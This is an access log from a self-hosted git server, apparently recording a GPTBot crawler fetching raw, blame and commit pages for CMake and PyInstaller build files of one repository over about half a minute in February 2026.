"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10931] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:04:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 11094] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 85] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:04:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 9952] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 10069] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:04:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 234] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16045] [Gzip 5.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:04:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12008] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:04:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 9944] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21829] [Gzip 12.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:04:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 11019] [Gzip 3.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" [Client 74.7.227.38] [Length 672] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeDirectoryInformation.cmake" +[17/Feb/2026:15:04:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" [Client 74.7.227.38] [Length 9945] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:15:04:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9933] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:04:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 8040] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:04:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 11514] [Gzip 4.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 16398] [Gzip 12.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:04:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 777] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 9956] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/DependInfo.cmake" +[17/Feb/2026:15:04:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73569] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:15:04:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" [Client 74.7.227.38] [Length 10175] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TargetDirectories.txt" +[17/Feb/2026:15:05:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 39740] [Gzip 13.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9932] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:05:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14330] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod04_pywin32.pyc" +[17/Feb/2026:15:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" [Client 74.7.227.38] [Length 53866] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/CMakeConfigureLog.yaml" +[17/Feb/2026:15:05:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:15:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" [Client 74.7.227.38] [Length 9964] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:15:05:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" [Client 74.7.227.38] [Length 9939] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:15:05:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9920] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 14302] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:05:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" [Client 74.7.227.38] [Length 4092] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:15:05:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 2] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:05:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/struct.pyc" +[17/Feb/2026:15:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 9955] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:05:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" [Client 74.7.227.38] [Length 10021] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:15:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/Makefile.cmake" [Client 74.7.227.38] [Length 14637] [Gzip 5.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles" +[17/Feb/2026:15:05:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 10940] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:05:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" [Client 74.7.227.38] [Length 9923] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs" +[17/Feb/2026:15:05:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 2814885] [Gzip 25.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:15:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" [Client 74.7.227.38] [Length 9914] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/base_library.zip" +[17/Feb/2026:15:05:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/PYZ-00.toc" [Client 74.7.227.38] [Length 77831] [Gzip -] 